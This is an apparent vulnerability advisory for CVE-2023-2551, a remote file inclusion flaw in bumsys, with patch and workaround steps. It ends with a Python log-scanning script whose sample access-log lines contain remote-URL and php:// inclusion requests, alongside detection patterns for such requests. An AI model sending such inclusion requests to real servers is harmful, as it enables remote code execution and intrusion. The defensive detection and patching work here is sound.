CVE-2023-2551

8.8 HIGH

📋 TL;DR

This CVE describes a PHP Remote File Inclusion vulnerability in the bumsys software that allows attackers to include and execute arbitrary remote files. Attackers can exploit this to execute malicious code on affected systems. Users running bumsys versions prior to 2.1.1 are affected.

💻 Affected Systems

Products:
  • bumsys
Versions: All versions prior to 2.1.1
Operating Systems: Any OS running PHP
Default Config Vulnerable: ⚠️ Yes
Notes: Requires PHP installation with allow_url_include enabled (often disabled by default in modern PHP versions).

⚠️ Risk & Real-World Impact

🔴 Worst Case: Full system compromise leading to remote code execution, data theft, and complete control over the affected server.

🟠 Likely Case: Arbitrary code execution leading to web shell installation, data exfiltration, and lateral movement within the network.

🟢 If Mitigated: Limited impact if proper web application firewalls and input validation are in place, potentially blocking malicious requests.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit details are publicly available in the huntr.dev bounty report and GitHub commit.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.1.1

Vendor Advisory: https://github.com/unilogies/bumsys/commit/86e29dd23df348ec6075f0c0de8e06b8d9fb0a9a

Restart Required: No

Instructions:

1. Update bumsys to version 2.1.1 or later.
2. Replace vulnerable files with patched versions from the GitHub commit.
3. Verify the fix by testing file inclusion functionality.

🔧 Temporary Workarounds

Disable allow_url_include (applies to: all)

Disable PHP's allow_url_include setting to prevent remote file inclusion.

php.ini: allow_url_include = Off

Web Application Firewall Rules (applies to: all)

Implement WAF rules to block requests containing remote file inclusion patterns.

🧯 If You Can't Patch

  • Implement strict input validation and sanitization for all file inclusion parameters.
  • Deploy network segmentation to isolate the vulnerable system from critical assets.

🔍 How to Verify

Check if Vulnerable:

Check whether the bumsys version is below 2.1.1, and review the code for unsafe file inclusion calls such as include() or require() whose path argument comes from user-controlled input.

Check Version:

Check bumsys documentation or configuration files for version information.

Verify Fix Applied:

Verify the installation is version 2.1.1 or later and test file inclusion functionality with controlled inputs.

📡 Detection & Monitoring

Log Indicators:

  • Unusual file inclusion attempts in web server logs
  • Requests containing remote URLs in file inclusion parameters
  • Multiple failed inclusion attempts from single IPs

Network Indicators:

  • HTTP requests with remote file paths in parameters
  • Outbound connections to unexpected domains following inclusion attempts

SIEM Query:

web_server_logs | where url contains "include" or url contains "require" | where url contains "http://" or url contains "https://"
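The SIEM query above matches literal substrings, so it also fires on any URL that merely quotes "http://" inside a search term and misses percent-encoded schemes such as https%3A%2F%2F. The following is an added illustration of the log indicators listed in this section; it is not code from bumsys or from the advisory. It decodes each query parameter, flags values that start with a remote scheme or a PHP stream wrapper, and counts flagged attempts per source IP. The access log lines, the parameter name "page", and the RFC 5737 addresses are all constructed sample data, not bumsys specifics.

```python
"""Flag remote-file-inclusion style requests in web server access logs.

Added illustration for this advisory; not code from bumsys or the advisory.
The log lines are constructed (RFC 5737 documentation addresses), and the
parameter name 'page' is an assumed example, not a known bumsys parameter.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl

# Combined-format access log entries (constructed sample, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2023:12:00:01 +0000] "GET /index.php?page=dashboard HTTP/1.1" 200 1532',
    '203.0.113.5 - - [10/May/2023:12:00:02 +0000] "GET /index.php?page=http://198.51.100.7/x.txt HTTP/1.1" 500 0',
    '203.0.113.5 - - [10/May/2023:12:00:03 +0000] "GET /index.php?page=https%3A%2F%2F198.51.100.7%2Fx.txt HTTP/1.1" 500 0',
    '203.0.113.5 - - [10/May/2023:12:00:04 +0000] "GET /index.php?page=php://input HTTP/1.1" 500 0',
    '198.51.100.20 - - [10/May/2023:12:05:00 +0000] "GET /index.php?page=ftp://example.invalid/shell.txt HTTP/1.1" 200 44',
    '192.0.2.9 - - [10/May/2023:12:06:00 +0000] "GET /search.php?q=see+http://example.invalid/page HTTP/1.1" 200 900',
]

# ip, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")
PHP_WRAPPERS = ("php://", "data:", "expect://", "phar://")


def suspicious_params(target):
    """Return [(name, decoded_value, reason)] for query parameters whose value
    is a remote URL or a PHP stream wrapper.

    Decoding first catches percent-encoded schemes; matching on the start of
    the value avoids flagging a URL that is merely quoted inside free text,
    which a plain 'contains http://' substring rule would hit.
    """
    query = target.split("?", 1)[1] if "?" in target else ""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        lowered = value.lower()
        if lowered.startswith(REMOTE_SCHEMES):
            hits.append((name, value, "remote-url"))
        elif lowered.startswith(PHP_WRAPPERS):
            hits.append((name, value, "php-wrapper"))
    return hits


def analyze(lines, repeat_threshold=3):
    """Scan access-log lines; return flagged events and the IPs that made
    at least repeat_threshold flagged requests."""
    events = []
    per_ip = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        for name, value, reason in suspicious_params(m["target"]):
            events.append({
                "ip": m["ip"], "time": m["ts"], "param": name,
                "value": value, "reason": reason, "status": int(m["status"]),
            })
            per_ip[m["ip"]] += 1
    repeat = sorted(ip for ip, n in per_ip.items() if n >= repeat_threshold)
    return {"events": events, "repeat_offenders": repeat}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for e in result["events"]:
        print(f'{e["ip"]} {e["reason"]:11} {e["param"]}={e["value"]} (HTTP {e["status"]})')
    print("repeat offenders:", result["repeat_offenders"])
```

Run against the constructed sample, the script flags four requests (three from 203.0.113.5, one from 198.51.100.20) and reports 203.0.113.5 as a repeat offender, while the search query that only mentions a URL in its text is left alone. In production, feed it the real access log and tune repeat_threshold to the site's normal traffic; the outbound-connection indicator listed above still needs a separate check on egress logs, since an access log only shows the inbound request.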
